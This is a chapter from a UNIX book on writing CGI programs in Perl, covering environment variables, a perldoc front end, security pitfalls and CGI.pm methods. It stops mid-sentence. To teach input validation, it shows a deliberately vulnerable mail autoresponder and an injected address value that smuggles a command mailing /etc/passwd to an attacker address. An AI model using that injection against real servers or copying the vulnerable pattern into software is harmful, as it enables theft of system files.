UNIX Unleashed, Internet Edition

- 19 -

Developing CGIs with Perl

By Matt Curtin

There are some things worth mentioning when considering CGI in Perl. (Likely, these are reminders of things you have already learned.)

Perl puts its environment variables into the hash (sometimes known as an "associative array") %ENV. To reference the environment variable HOME, you would then use $ENV{'HOME'}.
Much of this chapter will deal with using a Perl module known as CGI.pm, or one of its more task-specific friends. (Perl "modules" are analogous to C++ or Java "classes." These are simply components of the software that provide "methods" to your programs. Methods are just OO-speak for functions.)
Many of the code examples here are only "snippets," which need to be incorporated into CGI programs in order to actually run.

Why Perl?

Why not?

Actually, there are quite a few reasons to use Perl. Perl is a mature, portable, and flexible programming language. Such tasks as reading, writing, and mangling text are ideally done in Perl. A great deal of CGI programming is essentially text processing, sometimes in fairly creative ways, which makes Perl well-suited to the task of CGI programming. Additionally, there is a large base of free modules to make the task of CGI programming even easier, and many freely available programs that you can modify for your own needs or study to learn new techniques. Let's consider some needs of CGI programs in more detail, and compare Perl with some other languages.

Requirements of a CGI Language

You can use just about any programming language to write CGI programs--Shell, Scheme, C, Java, you name it. If it's a real programming language, you can write CGI with it. Not that doing so is a good idea, but you can even write CGI programs using something like BASIC. The point is that there's a difference between a language you can use and a language that you should use.

The language that you use for CGI should fit the application, just as in any other programming task. Typically, CGI programs perform tasks such as pattern matching, interfacing to databases, and generating HTML dynamically. Perl is by far the most popular CGI programming language because it is suited so well to these types of tasks.

In the following sections, I briefly compare Perl to some other programming languages that you can use for CGI programming. I do so strictly from the perspective of the needs of a good language for CGI programming.

Perl Versus UNIX Shell

UNIX shell scripts tend to be highly portable across various platforms. A number of trade-offs exist, though, in that shell scripts tend to be much slower than the same script implemented in Perl, C, or some other language that performs compilation of the entire program before it can be executed. You can handle deficiencies in the shell's capability to perform serious file manipulation by using tools such as awk, but even awk has limitations that could be significant in a CGI environment (such as being able to have only one file open at a time). As a result, shell is typically useful only for the smallest of scripts, such as simple <ISINDEX> gateways to services such as finger, archie, or other command-line tools, where you're only interested in seeing the results. Even in these cases, if you want to manipulate the results, or convert them from standard text to HTML, perhaps making appropriate words links to related or explanatory pages, Perl becomes a better option.

Perl Versus C/C++

Some CGI programmers prefer to use C, often because it's simply what they know. CGI programs implemented in C suffer from a number of problems, though: they're more likely to be susceptible to bugs in string handling or memory management that might even turn out to be security bugs. C is a great language for implementing systems that were done in assembler before C came about (such as operating systems) because it is very fast and allows the programmer to perform very low-level functions from a higher-level language that is more portable (than assembler) across architecture types.

CGI programs implemented in C, however, require at least a recompile for the target platform. If you're making a jump from one type of system to another, rewriting some parts of the program might even be required. C forces the CGI programmer to deal with other tasks (such as memory management) that only get in the way of accomplishing the task at hand. Further, its capability to do pattern matching is far behind Perl's. True, you can add pattern matching functionality, but that's additional overhead that must be compiled into your CGI program, rather than simply being an internal function, as it is in Perl.

I wouldn't implement an operating system in Perl (although I'm sure some people would), and I wouldn't implement a CGI program in C (although some do). Use the right tool for the job.

Perl Versus Java

The entire world has become abuzz with talk of Java. For this reason, some programmers have tried to use Java for everything, including CGI. Doing so presents a number of advantages; however, they currently seem to be outweighed by the consequences. Java's strengths include portability and simplicity. Remember, though, that data is passed to a CGI application through the operating system's environment. As Java does not support access to environment variables (because of portability issues), a programmer needs to write a wrapper that will read the environment, and then invoke the Java program using a command-line interface, with the appropriate environment variables defined as properties.

Java is very much in the same boat as C when it comes to functionality. Although the Java programmer is significantly less inclined to cause bugs due to silly errors than the C programmer is, the Java programmer ends up having to implement nearly everything himself or herself either in the CGI program, or having to distribute a number of requisite classes along with the program. Much of the promise of Java has already been fulfilled in Perl, especially in the realm of CGI programming. Unless Java does some job much better than Perl, relating specifically to the program you're planning to develop, Perl is a much better language for CGI programming.

If you do have a task to perform that really is best done in Java, it's probably best to not use CGI, but rather "servlets," or some other server-specific API. Of course, in doing this, you might lose the server-portability that you have in using CGI.

How Perl Does CGI

Some basic understanding of how Perl does CGI will be useful before we go forward. If you're already experienced with CGI programming, you might like to skip ahead to the next section, or glance over this section, looking for reminders.

Making the Server Able to Run Your Program

Remember, before a CGI program can run, several things will need to have taken place:

The HTTP server will need to have been told that your program is a CGI program, either by the directory it's under (such as somewhere under cgi-bin), or the file extension (such as .pl or .cgi). Consult your server's documentation for how to do this.
The operating system will have to allow its execution. This requires that the "execute bit" be turned on for the CGI program file. This can be done with the chmod(1) command, like

	chmod +x myprogram.pl

The location of the Perl interpreter must be specified in the first line of code. In all of these examples, I use /usr/bin/perl. If Perl is installed somewhere else on your system, either change the first line to have the correct path to the Perl interpreter, or create a symbolic link so that /usr/bin/perl will reference the correct file. Incidentally, this is also the line where important flags such as -T and -w need to be specified if you choose to use them. (Use of these flags is considered later.)

Some Examples

At this point, it would be useful to consider some example CGI programs. Remember, the web browser will need to be told the content type of the data coming its way in the HTTP header. Once this has been done, the data itself can come down, and will be interpreted properly by the browser. In the case of HTML, you'll need to have the HTTP header indicate the content type as text/html, send two newlines (to mark the end of the header and the beginning of the data), and then the HTML.

Your First CGI Program in Perl

Of course, the classic first program in any language is "Hello, world!" Likely, you've already seen this in Perl. In Listing 19.1, you'll see it again, with a twist: it's a CGI program.

Listing 19.1. "Hello, world"

#!/usr/bin/perl -Tw

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
  <head>
    <title>Hello, world!</title>
  </head>

  <body>
    <h1>Hello, world!</h1>
  </body>
</html>
EOD

Note the double newline between the last HTTP header (Content-type: text/html) and the first line of data (the <!DOCTYPE> declaration). If you're missing this, your program will not work properly.

Of course, this isn't really very interesting, since we could have achieved the same result by writing a standard HTML file. However, the power of CGI becomes a bit more obvious when looking at something slightly fancier: tell the user the result of the uptime(1) command, which is what we do in Listing 19.2.

Listing 19.2. Fancy "hello, world"

#!/usr/bin/perl -Tw

$ENV{'PATH'} = "";

$|=1;

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
  <head>
    <title>Fancy hello world!</title>
  </head>

  <body>
    <h1>Hello world!</h1>
    How long has this system been up?
    <pre>
EOD
  system("/usr/bin/uptime"); # for Solaris, *BSD, Linux
  # system("/usr/bsd/uptime"); # for IRIX
print <<EOD;
    </pre>
  </body>
</html>
EOD

echo.pl: Seeing CGI Environment Variables

Listing 19.3 has another program that should prove to be interesting: a Perl version of the popular echo.sh program that has come with a number of different HTTP servers, including NCSA's HTTPd and Apache. We're simply walking through the %ENV hash, and returning each key (environment variable), and its value, as a plain text file.

Listing 19.3. Perl Translation of echo.sh

#!/usr/bin/perl -Tw

print "Content-type: text/plain\n\n";

foreach $key(keys %ENV) {
  print "$key=$ENV{$key}\n";
}

Listing 19.4 is the same thing, except a bit fancier, using HTML tables:

Listing 19.4. Fancy CGI Environment Viewer

#!/usr/bin/perl -Tw

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
  <head>
    <title>What's our environment, anyway?</title>
  </head>

  <body>
    <h1>What's our environment, anyway?</h1>
    <table border>
      <caption>Environment variables and their values</caption>
      <TR>
        <th>Variable</th>
        <th>Value</th>
      </TR>
EOD

  foreach $key(sort keys %ENV) {
    print "<tr><td> $key </td><td> $ENV{$key} </td></tr> \n";
  }

print <<EOD;
    </table>
  </body>
</html>

EOD
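
Listing 19.4 drops each value into the table exactly as it arrives. Some of those values (the browser's identification string, for instance) come from the remote client, so a value containing < or & would be read as markup. What follows is a minimal sketch of one way to guard against that; the names escape_html and env_rows are mine, not part of the listing, and the shebang with -T and -w is left off so the snippet runs on its own.

```perl
use strict;
use warnings;

# Hypothetical helper: make a string safe to place inside HTML text.
sub escape_html {
    my ($text) = @_;
    $text = '' unless defined $text;
    $text =~ s/&/&amp;/g;    # ampersand first, or the later entities get re-escaped
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

# Build the table rows of Listing 19.4, escaping both names and values.
sub env_rows {
    my (%env) = @_;
    my $rows = '';
    foreach my $key (sort keys %env) {
        $rows .= '<tr><td>' . escape_html($key) . '</td><td>'
               . escape_html($env{$key}) . "</td></tr>\n";
    }
    return $rows;
}

print env_rows(%ENV);
```

In the listing itself, the body of the foreach loop would simply print the escaped key and value instead of the raw ones.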

perldoc.pl: A Web Front-End to perldoc(1)

Now let's invent a problem that might actually exist. You have found perldoc(1) to be incredibly useful. You would like to be able to use it from home, but don't want to do so through a telnet(1) window; you'd rather use your browser.

This is an easy task. The next listing shows a very simple <ISINDEX> interface to the perldoc(1) command, which demonstrates simple text processing and handling of (potentially dangerous) user input.

Notice the URL when perldoc.pl is run the first time. Then submit a query, and notice the URL again: your submission has become part of the URL, in the query string. To perform the lookup of the submitted command, we run the query string through a regular expression and then use a back reference to assign the matched value to $query. Remember, input from users is potentially dangerous, so we need to be sure that we're not allowing shell metacharacters anywhere near a shell. The regular expression /^(\w+)$/ matches only if the query string consists entirely of alphanumeric characters and underscores. Even so, Perl's -T switch still flags $ENV{'QUERY_STRING'} itself as "tainted", that is, untrusted and potentially dangerous. By assigning the value to a new variable from the back reference $1, we tell Perl that we know what we're doing, so Perl allows us to proceed.
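
The detainting step described above can be pulled out into a small routine of its own. This is only a sketch under my own naming (untaint_word is hypothetical), and it returns nothing at all when the input contains anything other than word characters, so the caller can tell "no query" apart from a clean one. The -T switch is left off the example so that it runs as a plain script; in a real CGI program it belongs on the first line.

```perl
use strict;
use warnings;

# Hypothetical helper: hand back the value only if it consists entirely
# of word characters (letters, digits, underscore). Under -T, a value
# captured by a regular expression group is no longer tainted.
sub untaint_word {
    my ($raw) = @_;
    return unless defined $raw;
    return $1 if $raw =~ /^(\w+)$/;
    return;
}

my $query = untaint_word($ENV{'QUERY_STRING'});
print defined($query) ? "looking up: $query\n" : "no usable query\n";
```

Checking the return value before using it avoids acting on a stale or empty $1 when the match fails.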

(As an aside, it's noteworthy that the result of a perldoc(1) request is in the same format as a man(1) request: nroff with man macros. Because of this, only minor modifications are needed to perldoc.pl to create a front end to man(1). Why not give that a try?)

Listing 19.5. Webified `perldoc(1)`

#!/usr/bin/perl -T

$ENV{'PATH'} = "/bin:/usr/bin:/usr/local/bin";

$ENV{'QUERY_STRING'} =~ /^(\w+)$/; # matches only alphanumerics and _
$query = $1;		   # tell perl not to worry, we've detainted

print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
  <title>perldoc $query</title>
</head>
<body bgcolor="#ffffff">
  <center>
  <h1><code>perldoc</code> Interface</h1>
  </center>
  <isindex>
  <h2>$query</h2>
  <pre>
EOD

# Don't bother running the command if there's no argument
if ($query) {
  open(PERLDOC, "/usr/local/bin/perldoc $query |") || die "Cannot perform perldoc query: $!";
  while(<PERLDOC>) {
    s/.\ch//g;      # strip nroff overstrikes (a character plus a backspace)
    s/&/&amp;/g;    # escape markup characters, ampersand first
    s/</&lt;/g;
    s/>/&gt;/g;
    print;
  }
  close PERLDOC;
}

print <<EOD;
  </pre>
  <hr>
  <address><a href="http://www.research.megasoft.com/people/cmcurtin/">C Matthew Curtin</a></address>
</body>
</html>
EOD

At this point, you should have some understanding of how Perl works with CGI. You can imagine a number of things that we haven't covered yet, like how to handle cookies, process more complex user input, forms, and so on. Even potentially difficult tasks are made considerably simpler with the CGI.pm module. We'll cover its use through the rest of the chapter.

CGI Programming Concerns

Would you connect your machine to the Internet if you knew that doing so would enable people to run commands on your machine? What if that machine has all your personal and private data on it? What if that machine is your company's Web server?

Well, keep in mind that's exactly what CGI is. A remote user, most often someone who hasn't gone through any kind of authentication--and someone who can't easily be tracked down (if at all)--is running programs on your Web server. I can't emphasize enough that this situation can be very dangerous. So let me say again: This situation can be very dangerous.

CGI is dangerous.

The nice thing about CGI on your Web server is that the programs that people are running on your machine are programs you've written. (You have control over what's on your server and what it can and can't do.) The bad thing about CGI on your Web server is that the programs that people are running on your machine are programs you've written. (Although you might write programs that are very nice and that do only what you want them to, you might be surprised to find out what else a naughty person can make them do.)

Trust Nothing

Consider the code in Listing 19.6. This little CGI program, which is sitting on your company's Web server, is called when a user enters an e-mail address to get more information about your company's New SuperWidgets.

Listing 19.6. SuperWidget Autoresponder.

#!/usr/bin/perl

use CGI;

$query = new CGI;
$email_addr = $query->param('email');

open(MAIL, "| Mail -s 'More information' $email_addr");

print MAIL <<EOD;
Thank you for your request.

Here at The Very Big Corporation of America, we think that
our SuperWidgets(tm) are pretty cool, and we hope you agree.

Sincerely,

Joe Mama
President, and Chief Executing Officer

EOD

Isn't that easy? Isn't Perl great? Now, you can just slap this bad boy up on the server, and you're all done. Right? Wrong. Sure, the program can do what you think it will, but it might also do something you haven't thought about. If someone claims that his e-mail address is something like

sillyname@sillyplace.com ; /bin/mail badboy@naughty.no < /etc/passwd

you might have a bit of a problem. Namely, badboy@naughty.no just got a copy of your password file. Oops.

The lesson here is obvious: don't trust any input from users. Remember, CGI programs are programs that run on your server. If these programs can be fooled into performing a task beyond what you've anticipated, you can have very serious security problems. Fortunately, Perl has an extremely useful -T switch, which would tell you about the vulnerability here and refuse to run. Don't even think about running a CGI program without specifying the -T switch. This is done by adding it to the end of the line specifying the path to Perl, making it look like:

  #!/usr/bin/perl -T

You especially need to consider this situation if you have any sort of "secure" service on the server, such as forms served by SSL that are used to get credit card numbers or other sensitive data from customers or partners. The more data that you have on the machine that is attractive to bad guys, the more resources they'll spend trying to get at what you're attempting to hide.

Another important consideration is that you don't really know what you're talking to on the other side of that connection. It might not be a browser at all, but rather someone who used telnet to talk to your HTTP port, attempting to interact with your daemon or programs in ways you haven't thought about. You have good reason to be paranoid about this problem.
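
Returning to Listing 19.6, here is one way the hole might be closed. Treat it as a sketch resting on several assumptions: the names clean_address and send_info are mine, the mailer path /usr/bin/mail is a guess that you'll need to adjust, the address check is deliberately stricter than the mail standards (it turns away some legitimate addresses), and the list form of a piped open() needs Perl 5.8 or later. The idea is twofold: refuse anything that doesn't look like a plain address, and start the mailer without a shell so there is nothing to interpret a semicolon.

```perl
use strict;
use warnings;

# Hypothetical, conservative check: a small character set, exactly one "@",
# and no leading "-" that a mail program could mistake for an option.
sub clean_address {
    my ($raw) = @_;
    return unless defined $raw;
    return $1
        if $raw =~ /^([A-Za-z0-9_][A-Za-z0-9_.+-]*\@[A-Za-z0-9][A-Za-z0-9.-]*)\z/;
    return;
}

# Send the message without a shell: the list form of a piped open()
# passes each argument straight to the program. Under -T you would also
# set $ENV{'PATH'} to a known value first, as Listing 19.5 does.
sub send_info {
    my ($address, $body) = @_;
    open(my $mail, '|-', '/usr/bin/mail', '-s', 'More information', $address)
        or die "Cannot start mail: $!";
    print $mail $body;
    close($mail) or die "mail failed: $! (status $?)";
    return 1;
}

my $addr = clean_address(
    'sillyname@sillyplace.com ; /bin/mail badboy@naughty.no < /etc/passwd');
print defined($addr) ? "would mail $addr\n" : "address rejected\n";
```

With the hostile address shown earlier, clean_address() returns nothing, so send_info() is never reached.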

Common Pitfalls with CGI Programs in Perl

Perl is a wonderfully powerful language. You do need to be careful while writing CGI programs to avoid common pitfalls, however. Some of them are related to functionality, whereas others are related to security. Keep them all in mind, and remember to make your programs functional and secure. Now take a look at some of my favorite pitfalls:

Passing unsafe data to shells
This problem is, by far, the worst for new (and careless) Perl programmers. An example is cited in Listing 19.6. Listing 19.5 also had potential for that, since we used a shell (when we opened the PERLDOC file handle), but our handling of $ENV{'QUERY_STRING'} and turning it into $query took care of this problem. If you possibly can, you're almost always best off avoiding the use of shells in CGI programs.
Making assumptions about the environment
Many people write programs assuming that other programs and files in the system will be where they are on their system. In practice, programs and configuration files might be in another place, or not even exist, on an operating system from another vendor. In making such assumptions, Perl's extreme portability is hindered, and you have to rework the programs when moving from one environment to another. I like to keep dependencies on external resources (such as the shell or underlying UNIX commands) to a minimum, not using them at all unless I can't avoid doing so for some reason, which is a pretty rare event. (However, in Listing 19.5, you'll note that we did. In this case, the program would have become more complex to avoid using the shell, so it made more sense to just use a shell, and detaint the user's input ourselves.)
Having file permission problems
Remember, the program is going to be run under the UID of the HTTP daemon on your system. You need to be sure that the HTTP daemon has read access to the program, that the program has the execute bit turned on, and that any files that will be read, written, created, or deleted can have whatever you need done to them under the UID of the HTTP daemon.
Failing to perform sufficient error checking
Do yourself a favor, and check for error conditions. When your program encounters an unexpected error on an open() or fork() or anything else, rather than have it silently stop working, use die() to make it complain loudly about the problem. Notice how Listing 19.5 uses die() with the open(). If perldoc isn't in /usr/local/bin/, or if some other error occurs, use of that die() could save you a lot of time hunting down and eradicating the problem.
Not taking advantage of useful Perl options
Here's a fun way to waste lots of time trying to find stupid mistakes. We've already mentioned -T, but let me emphasize again: don't ever run CGI Perl programs without it. Also, another useful switch is -w. This will give you warnings about potential problems in your code. Never test code without -w specified. If you are getting warnings when -w is specified, you're best off solving them, not making them "go away" by removing -w. On the other hand, if you are getting a warning, you know what it means, why it's being made, and that it won't create problems for you, it might be all right to remove -w when moving your program to production.
Not taking advantage of useful Perl modules
Much of the work in providing interfaces to data, parsing capabilities, and so on already exists. Instead of having to implement them, you'll be much more productive using that which is already available. You should definitely use the several extremely cool CGI Perl modules if you're writing any CGI that's more than a few lines long. In fact, if you don't have CGI.pm, go get it right now. I can wait. Done? Good, you're going to need it in the next section.
Forgetting to flush STDOUT
Good CGI programmers tell their programs to flush the STDOUT output buffer after each write. This way, the MIME type gets out (and the browser can see it) before the program goes down in flames. (This is done by setting $| to a nonzero value. Notice Listing 19.2. Comment out the line where I set the value of $| and then run the program again. See the difference? When the output is buffered, the result of uptime(1) is returned before the rest of the program's output. This is clearly bad, so be sure to set $| to something nonzero for your CGI programs.)
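
Several of the pitfalls above can be sidestepped in a handful of lines. The sketch below is one possible arrangement, not a prescription: run_or_die is a name I made up, and the child process is the Perl interpreter itself (found through $^X) only so that the example doesn't depend on where a command such as uptime lives on your system. It flushes STDOUT, runs the external program without a shell by giving system() a list of two or more elements, and complains loudly if anything goes wrong. The -T and -w switches are omitted from the example so it runs as a plain script.

```perl
use strict;
use warnings;

$| = 1;    # flush STDOUT after every write, so the header goes out first

# Hypothetical helper: run an external program without a shell and die
# with a useful message if it cannot be started or reports failure.
sub run_or_die {
    my (@command) = @_;
    my $status = system(@command);    # list of 2+ elements: no shell involved
    die "Cannot run $command[0]: $!" if $status == -1;
    die "$command[0] failed (wait status $status)" if $status != 0;
    return 1;
}

print "Content-type: text/plain\n\n";
run_or_die($^X, '-e', 'print "ok from a child process\n"');
```

Because $| is set, the Content-type line reaches the browser before the child's output, which is the ordering problem described under "Forgetting to flush STDOUT."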

Introduction to `CGI.pm`

Using CGI.pm

Using CGI.pm is easy. To write a CGI program, you simply need to create a new CGI object, throw some parameters at it, and a new CGI program is born. Now take a look at some code snippets, and see what each one does.

You create a new CGI object just as you would create any other Perl object:

use CGI;
$cgi = new CGI;

You can also create CGI objects and feed them parameters at the same time. For example, if you want to send some parameters in via an open file handle, you simply need to reference the file handle glob you want. It can be STDIN, some file with key/value pairs used for debugging, or just about anything else, as you can see here:

$cgi = new CGI(\*STDIN);

(In reality, you could just use the file handle name, but passing the glob reference is the official method of passing file handles, which is why I show it here. The * character, in this context, denotes a "typeglob," which stands for everything in the symbol table with the given name. Hence, a "globbed" name like *STDIN covers the file handle STDIN as well as $STDIN, @STDIN, and %STDIN.)
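
Passing a file handle by glob reference works the same way for your own subroutines as it does for the CGI constructor. Here is a small sketch that doesn't involve CGI.pm at all: read_pairs is a hypothetical helper, and an in-memory file (which needs Perl 5.8 or later) stands in for STDIN or a debugging file of key/value pairs.

```perl
use strict;
use warnings;

# Hypothetical helper: read "key=value" lines from whatever file handle
# the caller passes in, and return them as a hash.
sub read_pairs {
    my ($fh) = @_;
    my %pairs;
    while (my $line = <$fh>) {
        chomp $line;
        next unless $line =~ /^([^=]+)=(.*)$/;
        $pairs{$1} = $2;
    }
    return %pairs;
}

# An in-memory file stands in for STDIN or a debugging file here.
my $text = "king=Arthur\nbrave=Lancelot\nservant=Patsy\n";
open(PAIRS, '<', \$text) or die "Cannot open in-memory file: $!";
my %knights = read_pairs(\*PAIRS);    # pass a reference to the glob
close(PAIRS);

print "$_ => $knights{$_}\n" foreach sort keys %knights;
```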

Additionally, you can hardwire associative array key/value pairs into the new object being created this way:

$cgi = new CGI({    'king' => 'Arthur',
                   'brave' => 'Lancelot',
                  'others' => [qw/Robin Gallahad/],
                 'servant' => 'Patsy'});

Another useful initialization option is to pass a URL style query string, as follows:

$cgi = new CGI('name=lancelot&favoritecolor=blue');

And, of course, you can create a new CGI object with no values defined:

$cgi = new CGI('');
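
To see roughly what happens to a URL-style query string once it is handed over, consider the following simplified sketch. It is not CGI.pm's actual code, and parse_query is a name of my own; it only illustrates the usual decoding rules (pairs separated by & or ;, + standing for a space, %XX standing for one byte) and shows how a parameter can end up with more than one value.

```perl
use strict;
use warnings;

# Simplified sketch: split a query string into a hash that maps each
# parameter name to a reference to the list of its values.
sub parse_query {
    my ($query) = @_;
    my %params;
    foreach my $pair (split /[&;]/, $query) {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $name && length $name;
        $value = '' unless defined $value;
        foreach ($name, $value) {
            tr/+/ /;                                # "+" encodes a space
            s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;    # %XX encodes one byte
        }
        push @{ $params{$name} }, $value;
    }
    return %params;
}

my %params = parse_query('name=lancelot&favoritecolor=blue');
print "$_ = @{ $params{$_} }\n" foreach sort keys %params;
```

In a real program you would let CGI.pm do this work; the sketch is only meant to take some of the mystery out of it.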

When to Use `CGI.pm`

As with all tasks when you're programming in Perl, you can find more than one way to do the job. In my experience, if the program is more complex than what can be reasonably accomplished in a few lines of code, or will require the parsing of input from the user that is more complex than what can be obtained through environment variables, then using CGI.pm is the way to go.

In simple cases, such as checking the user's browser type, doing the job without CGI.pm is just as easy as doing it with CGI.pm. In such cases, I typically do not use CGI.pm. These times are fairly rare, however; most of the time you use CGI, you do so because someone wants to give some level of feedback to the server, which means that the server needs to be able to read the data and make it useful.

Sometimes you might need a specific part of CGI.pm but don't want the whole thing, perhaps because you're optimizing for speed, or don't want to use the extra memory of the whole CGI.pm module. In these cases, you can use a number of related modules geared toward more specific tasks to give you some of the features you're looking for in CGI.pm without the overhead.

You can find the WWW-related modules (including CGI) on the Web at

http://www.perl.org/CPAN/modules/by-category/15_World_Wide_Web_HTML_HTTP_CGI/

In the end, most often you'll find using CGI.pm or a related CGI module more advantageous than doing the work yourself. In addition to CGI.pm's convenience, there are some extra security checks to help keep you from being caught doing stupid things. Use the tools available, unless the job is so small that they'll make more work for you.

Some CGI.pm Methods

In this section, I've included examples to highlight some of the features that I've found particularly useful in CGI.pm. Check the documentation for the complete (and current) list of available features. I hope that the information I present here is enough for you to understand how CGI.pm works so that when you see other features in the documentation, you'll be able to begin using them quickly.

Much of this section has been adapted from the CGI.pm documentation, by Lincoln Stein <lstein@genome.wi.mit.edu> (http://www.genome.wi.mit.edu/~lstein/), and has been used with permission.

keywords()
You can fetch a list of keywords from an <ISINDEX> query by using the keywords() method. For example,

@keywords = $cgi->keywords;

param()
You use this method to get and set the names and values of parameters. If you need to know all the parameters (that is, their names) that were passed to your program, you can use the param() method this way:

@params = $cgi->param;

To get the value of a given parameter, simply pass the name of the parameter whose value you want to fetch to the param() method. What comes back depends on how you call it: assigned to an array, the method returns all of the parameter's values; assigned to a scalar, it returns a single value.

      $value = $cgi->param('foo');   # for scalars
      @values = $cgi->param('foo');  # for arrays

Setting values is similarly easy. Passing an array to the parameter results in your having a multivalued parameter. This capability is useful for a number of purposes: initializing elements of a fill-out form, changing the value of a field after it has already been set, and so on.

      $cgi->param(  -name => 'foo',
                  -values => ['first', 'second', 'third', 'etc.']);

append()
If you need to add information to a parameter, you can use the append() method as follows:

      $cgi->append(  -name => 'foo',
                   -values => ['some', 'more', 'stuff']);

delete()
This method, as the name suggests, deletes a parameter.

      $cgi->delete('foo');

delete_all()
This method deletes all parameters, leaving an empty CGI object.

      $cgi->delete_all();

Importing `CGI.pm` Methods into the Current Namespace

The use CGI statement imports method names into the current namespace. If you want to import only specific methods, you may do so as follows:

use CGI qw(header start_html end_html);

It's possible that you'll want to import groups of methods into the current namespace rather than individual methods on a one-by-one basis. Simply specify which method family you want this way:

use CGI qw(:cgi :form :html2);

Be aware, however, that this makes the source code a bit more difficult to follow for someone else. Additionally, this isn't considered "good OO" practice. By importing the methods directly into your current namespace, it will be much more difficult to maintain and expand the program. Should you find yourself in a situation where you want to use more than one CGI object, for example, it will become confusing to keep track of which object you're referencing. Consider yourself warned.

The following are the method families available for you to use:

:cgi
These methods support the CGI protocol, including param(), path_info(), cookie(), request_method(), header(), and so on.
:form
All the form-generating methods live here.
:html2
html2 shortcuts such as br(), p(), and so on are here, as well as close-enough-to html2 methods such as start_html() and end_html().
:html3
html3.2 tags such as html3 tables live here.
:netscape
Netscape-isms that aren't html3 are here. Some examples are frameset(), blink(), and center().
:html
This family is a union of html2, html3, and Netscape.
:standard
This family is a union of html2, form, and cgi.
:all
This family is a union of everything.

If you want to use a tag that someone implements, you can do so and still use it in your local namespace by using the :any method family, as in the following example. Using this family causes any unrecognized method to be interpreted as a new HTML tag. Beware that typos are interpreted as new tags.

use CGI qw(:any :all);
$q = new CGI;
print $q->newtag({     parameter => 'value',
                  otherParameter => 'anotherValue'});

Saving State via Self-Referencing URL

A simple way of saving the state information is to use the self_url() method, which returns a redirect URL that reinvokes the program with all its state information. Here's the syntax:

$my_url = $cgi->self_url;

You can get the URL without all of the query string appended by using the url() method instead:

$my_url = $cgi->url;
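
The idea behind a self-referencing URL is simple enough to sketch by hand: take the program's own URL and append the current parameters, suitably encoded. The following is a simplified illustration, not CGI.pm's actual code. The names url_encode and build_self_url, and the path /cgi-bin/quest.pl, are made up for the example, and values are assumed to be plain byte strings.

```perl
use strict;
use warnings;

# Percent-encode everything except unreserved URL characters.
sub url_encode {
    my ($text) = @_;
    $text =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord($1))/ge;
    return $text;
}

# Simplified sketch: append name=value pairs to the program's own URL.
# %params maps each name to a reference to the list of its values.
sub build_self_url {
    my ($base, %params) = @_;
    my @pairs;
    foreach my $name (sort keys %params) {
        push @pairs, url_encode($name) . '=' . url_encode($_)
            foreach @{ $params{$name} };
    }
    return @pairs ? $base . '?' . join('&', @pairs) : $base;
}

print build_self_url('/cgi-bin/quest.pl',
                     name => ['lancelot'], favoritecolor => ['blue']), "\n";
```

A link built this way carries the whole state with it, which is why following it reinvokes the program just as it was.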

Another method of saving state information is to use cookies. I talk about how to use them later in the chapter.

CGI Functions That Take Multiple Arguments

Although I provided an example like the following already, it's important enough to emphasize. If you want to create a text input field, for example, you can do so like this:

$field = $cgi->textfield(   -name => 'IQ',
                         -default => '160');

A nice side effect of being able to pass named arguments to a function is that you can give arguments to tags, even if the CGI module doesn't know about them. For example, if in some future version of HTML, the align argument is recognized, you can simply start using it like this:

$field = $cgi->textfield(   -name => 'IQ',
                         -default => '160',
                           -align => 'right');
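
Why do unknown arguments pass straight through? A sketch of the general technique makes it clear. The following is not CGI.pm's implementation; text_input is a hypothetical stand-in for textfield(), written only to show that once arguments arrive as name/value pairs, turning every pair into a tag attribute takes no special knowledge of any one of them.

```perl
use strict;
use warnings;

# Simplified sketch: turn "-name => value" arguments into attributes of
# an <input> tag. Arguments the sub has never heard of (such as -align)
# simply become attributes too.
sub text_input {
    my (%args) = @_;
    my %attr = (type => 'text');
    foreach my $key (keys %args) {
        (my $name = lc $key) =~ s/^-//;       # "-Name" becomes "name"
        $name = 'value' if $name eq 'default';
        my $value = $args{$key};
        $value =~ s/&/&amp;/g;                # keep the attribute well-formed
        $value =~ s/"/&quot;/g;
        $value =~ s/</&lt;/g;
        $attr{$name} = $value;
    }
    my @parts = ('<input');
    foreach my $name (sort keys %attr) {
        push @parts, qq($name="$attr{$name}");
    }
    return join(' ', @parts) . '>';
}

print text_input(-name => 'IQ', -default => '160', -align => 'right'), "\n";
```

The attributes are sorted only to make the output predictable; their order makes no difference to a browser.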

HTTP Headers

The header() method, as shown here, prints out the appropriate HTTP header and a blank line beneath (to separate the header from the document itself). If no argument is given, the default type of text/html is used.

print $cgi->header('text/html');

You can specify additional header information the same way you pass multiple arguments to any object:

print $cgi->header(   -type => 'text/html',
                    -status => '',
                   -expires => '+1h',
                    -cookie => $my_chocolate_chip);

You can even make up your own as in the following example:

print $cgi->header( -type => 'text/html',
                   -motto => 'Live Free or Die!');

Of course, making up your own header doesn't have much point because usually the only thing that sees the headers is a browser. However, that does mean that if a new version of HTTP is released and has headers that you want to use, you can do so without waiting for a new version of CGI.pm.
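
If you're curious what such a call boils down to on the wire, here is a simplified sketch. It is not CGI.pm's code: http_header is a made-up name, and the sketch deliberately ignores the special handling that arguments such as -expires and -cookie would need. It shows only the general shape: an optional Status line, any extra headers passed through by name, the content type, and the blank line that ends the header.

```perl
use strict;
use warnings;

# Simplified sketch of building a CGI response header from named
# arguments. -type defaults to text/html; -status becomes a Status:
# line; anything else is passed through as a header of the same name.
sub http_header {
    my (%args) = @_;
    my $type   = delete($args{-type}) || 'text/html';
    my $status = delete($args{-status});
    my @lines;
    push @lines, "Status: $status" if defined $status && length $status;
    foreach my $key (sort keys %args) {
        (my $name = $key) =~ s/^-//;
        push @lines, ucfirst($name) . ": $args{$key}";
    }
    push @lines, "Content-type: $type";
    return join("\n", @lines) . "\n\n";    # the blank line ends the header
}

print http_header(-type => 'text/html', -motto => 'Live Free or Die!');
print "<html><body>Hello</body></html>\n";
```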

You can specify the following:

-type
This is the MIME type of the document that the CGI program returns. In this case, it's text/html. Any MIME type is valid here.
-status
This optional field is the HTTP status code. You might want to use it if your CGI returns cached information that it gets from other servers; here's an example:

